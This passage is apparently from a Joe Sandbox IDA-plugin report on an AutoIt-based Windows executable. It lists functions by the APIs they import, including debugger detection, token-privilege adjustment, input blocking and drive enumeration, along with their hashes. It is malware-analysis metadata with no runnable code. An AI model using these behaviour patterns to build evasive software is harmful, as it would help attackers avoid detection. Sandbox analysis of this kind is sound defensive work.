                                                                  • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                  • String ID:
                                                                  • API String ID: 2695905019-0
                                                                  • Opcode ID: 9156530011793dd9707079ad5bb787af850af5e90eab2a2603f338c73b2284b4
                                                                  • Instruction ID: c917b509bfaf381f4ab8c46f7dcafe5d758b9c9cd417ece9e5954d806ddf42fb
                                                                  • Opcode Fuzzy Hash: 9156530011793dd9707079ad5bb787af850af5e90eab2a2603f338c73b2284b4
                                                                  • Instruction Fuzzy Hash: 07F0A07081091057931477BCAC0D8AE77AFAE82335B504701F93AC22E0E7B99A958695
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: LocalTime
                                                                  • String ID: %.3d$X64
                                                                  • API String ID: 481472006-1077770165
                                                                  • Opcode ID: 2d0affdf7879de8d62392eac0b8da2a83873ceee51ebb24c8e29cb7940df0b4a
                                                                  • Instruction ID: b4003cb333e1e6e5778058accf61c4a4958728aa30485878a3154f5febb2276d
                                                                  • Opcode Fuzzy Hash: 2d0affdf7879de8d62392eac0b8da2a83873ceee51ebb24c8e29cb7940df0b4a
                                                                  • Instruction Fuzzy Hash: DED012B1C04108EACBC097909C48CB973BFAB1C300F10C4A6FA0A91041F6319A4D9721
                                                                  APIs
                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00652A8A
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00652A94
                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00652AA1
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                  • String ID:
                                                                  • API String ID: 3906539128-0
                                                                  • Opcode ID: 4a69f703fc67b9a8925a251a8f48fec43c4f26f35344defe2d1a605a3ac751b7
                                                                  • Instruction ID: e96ab9ffdc0eb4d9dc1b1ad740605b1be78014a4960329b338c6418914b9b108
                                                                  • Opcode Fuzzy Hash: 4a69f703fc67b9a8925a251a8f48fec43c4f26f35344defe2d1a605a3ac751b7
                                                                  • Instruction Fuzzy Hash: 7731D47490122D9BCB61DF68D9897DCBBB9AF08310F5042DAE90CA7261E7309F858F45
                                                                  APIs
                                                                    • Part of subcall function 0064014B: __CxxThrowException@8.LIBVCRUNTIME ref: 006409D8
                                                                    • Part of subcall function 0064014B: __CxxThrowException@8.LIBVCRUNTIME ref: 006409F5
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0068205A
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00682087
                                                                  • GetLastError.KERNEL32 ref: 00682097
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                  • String ID:
                                                                  • API String ID: 577356006-0
                                                                  • Opcode ID: e07e5b685a084c702a3f661ebc9237512d3f66b23c8fcc63c0d5840d67449b26
                                                                  • Instruction ID: e795ec78351e713b676a0a0d84bd3011c8b540b1771087774aaaf9bf346a2ca9
                                                                  • Opcode Fuzzy Hash: e07e5b685a084c702a3f661ebc9237512d3f66b23c8fcc63c0d5840d67449b26
                                                                  • Instruction Fuzzy Hash: D511BFB1400205AFE728AF54DC86D6BB7BAEB08714B20862EE44657251EB70BC41CB24
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(?,?,0064502E,?,006E98D8,0000000C,00645185,?,00000002,00000000), ref: 00645079
                                                                  • TerminateProcess.KERNEL32(00000000,?,0064502E,?,006E98D8,0000000C,00645185,?,00000002,00000000), ref: 00645080
                                                                  • ExitProcess.KERNEL32 ref: 00645092
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CurrentExitTerminate
                                                                  • String ID:
                                                                  • API String ID: 1703294689-0
                                                                  • Opcode ID: 0dad9e59fd80f2d168394419b27a30d49657182d757e39b17ce8aeb373408cbd
                                                                  • Instruction ID: dab816e7c0ff396b91f43d8200d936b39ee6d458f56b2ae3240afa2b3871f721
                                                                  • Opcode Fuzzy Hash: 0dad9e59fd80f2d168394419b27a30d49657182d757e39b17ce8aeb373408cbd
                                                                  • Instruction Fuzzy Hash: 04E08C75000508AFCF216F54CD08E983BABEF11B81F004518F80A8A233EB35DD82CBC1
                                                                  APIs
                                                                  • GetUserNameW.ADVAPI32(?,?), ref: 0067E664
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: NameUser
                                                                  • String ID: X64
                                                                  • API String ID: 2645101109-893830106
                                                                  • Opcode ID: 9d91d10c17ed0daa8dbb68d70a80693aba3e041c9e82333fe0e1f8cb303ab2dd
                                                                  • Instruction ID: f5cccd14381b66eaf62d97a098bb45351e2d6f9b81074bf59721f1d450ae4c6a
                                                                  • Opcode Fuzzy Hash: 9d91d10c17ed0daa8dbb68d70a80693aba3e041c9e82333fe0e1f8cb303ab2dd
                                                                  • Instruction Fuzzy Hash: CAD0C9F480111DEACB80DF50EC88DDA73BDBB08304F104691F106A2040D73095498B20
                                                                  APIs
                                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,006A52EE,?,?,00000035,?), ref: 00694229
                                                                  • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,006A52EE,?,?,00000035,?), ref: 00694239
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFormatLastMessage
                                                                  • String ID:
                                                                  • API String ID: 3479602957-0
                                                                  • Opcode ID: bb5b7e4902e6ace52106bbdd8b8b1ad3d8b4aabb238cafe20069f42ac9e4dfe1
                                                                  • Instruction ID: 154676adc95a83894d1db7a82e45d5d5d6fbbe716d22fc60de9f323f9c7038df
                                                                  • Opcode Fuzzy Hash: bb5b7e4902e6ace52106bbdd8b8b1ad3d8b4aabb238cafe20069f42ac9e4dfe1
                                                                  • Instruction Fuzzy Hash: 81F0E5706002256AEB205765AC4DFEB366FFFC5B61F000279F605D2281D9709E41C7B0
                                                                  APIs
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00681B48), ref: 00681A20
                                                                  • CloseHandle.KERNEL32(?,?,00681B48), ref: 00681A35
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                  • String ID:
                                                                  • API String ID: 81990902-0
                                                                  • Opcode ID: 50bd2fed38e630a2cdff82fdb1d368d41cdcd85da90aab85e4235b9478a1ac30
                                                                  • Instruction ID: a083dbb813a913a8dfd7a936f8fbc89b78a9d41c4524171d2e4c0e9fbf317d03
                                                                  • Opcode Fuzzy Hash: 50bd2fed38e630a2cdff82fdb1d368d41cdcd85da90aab85e4235b9478a1ac30
                                                                  • Instruction Fuzzy Hash: CDE04F72004610AFF7252B50FC05F7677EAEB04320F14892DF59585470EB726C91DB14
                                                                  APIs
                                                                  • BlockInput.USER32(00000001), ref: 0069F51A
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: BlockInput
                                                                  • String ID:
                                                                  • API String ID: 3456056419-0
                                                                  • Opcode ID: 11324a2284d3aa3f3d1887ec1d9b6affce255d230cbe8b89f08388f108cd86fd
                                                                  • Instruction ID: 08c5a3092e28400f2ea537ded61876dcd6ff355fbfdf5ae2486bb5c5e7c9ca21
                                                                  • Opcode Fuzzy Hash: 11324a2284d3aa3f3d1887ec1d9b6affce255d230cbe8b89f08388f108cd86fd
                                                                  • Instruction Fuzzy Hash: 02E048313102145FC750AF69E804D9AF7DDAFA4771F018429F849C7351D670F9418B95
                                                                  APIs
                                                                  • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 0068EC95
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: mouse_event
                                                                  • String ID:
                                                                  • API String ID: 2434400541-0
                                                                  • Opcode ID: 6567666cf24652049ecdd5f0f477a05ee2e110a7727202aca92d29cfa56710c1
                                                                  • Instruction ID: da5b84a7257f757522a0045bdbef6d20da02253b5330b40ff555994cf4d93eda
                                                                  • Opcode Fuzzy Hash: 6567666cf24652049ecdd5f0f477a05ee2e110a7727202aca92d29cfa56710c1
                                                                  • Instruction Fuzzy Hash: 32D05EB69D022079E91C3A3C8F2FFB6090BE302741F80534DF122D9A95E4C399419321
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,0064075E), ref: 00640D4A
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: ecfb24bf87ba100a688548cb38fe8748e938a93ac59d6cdde063e43e33939faf
                                                                  • Instruction ID: 20dbfe665368f07b3438510c7990b96f0bb0695d7dc9467445b36d60140515e3
                                                                  • Opcode Fuzzy Hash: ecfb24bf87ba100a688548cb38fe8748e938a93ac59d6cdde063e43e33939faf
                                                                  • Instruction Fuzzy Hash:
                                                                  APIs
                                                                  • DeleteObject.GDI32(00000000), ref: 006A358D
                                                                  • DeleteObject.GDI32(00000000), ref: 006A35A0
                                                                  • DestroyWindow.USER32 ref: 006A35AF
                                                                  • GetDesktopWindow.USER32 ref: 006A35CA
                                                                  • GetWindowRect.USER32(00000000), ref: 006A35D1
                                                                  • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 006A3700
                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 006A370E
                                                                  • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A3755
                                                                  • GetClientRect.USER32(00000000,?), ref: 006A3761
                                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 006A379D
                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A37BF
                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A37D2
                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A37DD
                                                                  • GlobalLock.KERNEL32(00000000), ref: 006A37E6
                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A37F5
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 006A37FE
                                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A3805
                                                                  • GlobalFree.KERNEL32(00000000), ref: 006A3810
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A3822
                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,006C0C04,00000000), ref: 006A3838
                                                                  • GlobalFree.KERNEL32(00000000), ref: 006A3848
                                                                  • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 006A386E
                                                                  • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 006A388D
                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A38AF
                                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A3A9C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                  • API String ID: 2211948467-2373415609
                                                                  • Opcode ID: 4a1c114aa66a00b433fc7bea8d86fc9b03ce60c0e9b7012a96007ef6fe7cea5b
                                                                  • Instruction ID: 45d99989126f1f9e57a1b28de0641ae0a95cee0184d38626267dd4f7ccb7ac92
                                                                  • Opcode Fuzzy Hash: 4a1c114aa66a00b433fc7bea8d86fc9b03ce60c0e9b7012a96007ef6fe7cea5b
                                                                  • Instruction Fuzzy Hash: 570282B2900215AFDB14DF68DC49EAE7BBAFF49310F048258F9159B2A0DB74AD41CF60
                                                                  APIs
                                                                  • DestroyWindow.USER32(?,?), ref: 006216B4
                                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 00662B07
                                                                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00662B40
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00662F85
                                                                    • Part of subcall function 00621802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00621488,?,00000000,?,?,?,?,0062145A,00000000,?), ref: 00621865
                                                                  • SendMessageW.USER32(?,00001053), ref: 00662FC1
                                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00662FD8
                                                                  • ImageList_Destroy.COMCTL32(00000000,?), ref: 00662FEE
                                                                  • ImageList_Destroy.COMCTL32(00000000,?), ref: 00662FF9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                  • String ID: 0$(o$(o$(o
                                                                  • API String ID: 2760611726-1013658127
                                                                  • Opcode ID: 7c5897ae1d81f3aa2ad8e60749c2dd9da2c7865a59f3fe98e47f8a0f4ad097c9
                                                                  • Instruction ID: da73fcdb277a36ceae25732c4dd75047fd279c04cf5d22d8ee2276dda41d64e6
                                                                  • Opcode Fuzzy Hash: 7c5897ae1d81f3aa2ad8e60749c2dd9da2c7865a59f3fe98e47f8a0f4ad097c9
                                                                  • Instruction Fuzzy Hash: 5412CB30204A12AFC725CF14D8A8BAABBE3FF55300F185569F4959B261C772E882CF91
                                                                  APIs
                                                                  • DestroyWindow.USER32(00000000), ref: 006A319B
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 006A32C7
                                                                  • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 006A3306
                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 006A3316
                                                                  • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 006A335D
                                                                  • GetClientRect.USER32(00000000,?), ref: 006A3369
                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 006A33B2
                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 006A33C1
                                                                  • GetStockObject.GDI32(00000011), ref: 006A33D1
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 006A33D5
                                                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 006A33E5
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 006A33EE
                                                                  • DeleteDC.GDI32(00000000), ref: 006A33F7
                                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 006A3423
                                                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 006A343A
                                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 006A347A
                                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 006A348E
                                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 006A349F
                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 006A34D4
                                                                  • GetStockObject.GDI32(00000011), ref: 006A34DF
                                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 006A34EA
                                                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 006A34F4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                  • API String ID: 2910397461-517079104
                                                                  • Opcode ID: 8ec89ecd653a52299679393f5bba855ece953d10b1ecb0305a19b075e9a89286
                                                                  • Instruction ID: ad4dce679bbe5db58f2f2a73d36c44f4b61989324942bf6a2f29aa13373b46ad
                                                                  • Opcode Fuzzy Hash: 8ec89ecd653a52299679393f5bba855ece953d10b1ecb0305a19b075e9a89286
                                                                  • Instruction Fuzzy Hash: EAB14FB1A40215AFEB14DFA8DC45FAE7BBAEB09710F004218F915EB290D774AD40CF94
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00695532
                                                                  • GetDriveTypeW.KERNEL32(?,006BDC30,?,\\.\,006BDCD0), ref: 0069560F
                                                                  • SetErrorMode.KERNEL32(00000000,006BDC30,?,\\.\,006BDCD0), ref: 0069577B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$DriveType
                                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                  • API String ID: 2907320926-4222207086
                                                                  • Opcode ID: 5f84efbe1943de4e62cb9c17e8993b283118bb3258dfb38dc6976eb8553514ee
                                                                  • Instruction ID: 6d48aa9687aaed123c9b1820a170bc88d018b4acef5dc62a69eee4e2bd2832ff
                                                                  • Opcode Fuzzy Hash: 5f84efbe1943de4e62cb9c17e8993b283118bb3258dfb38dc6976eb8553514ee
                                                                  • Instruction Fuzzy Hash: 3561F130A09A45DFCF2ADF64ED918B877ABEF14310B258019E407AF6A1D731EE42CB41
                                                                  APIs
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006225F8
                                                                  • GetSystemMetrics.USER32(00000007), ref: 00622600
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0062262B
                                                                  • GetSystemMetrics.USER32(00000008), ref: 00622633
                                                                  • GetSystemMetrics.USER32(00000004), ref: 00622658
                                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00622675
                                                                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00622685
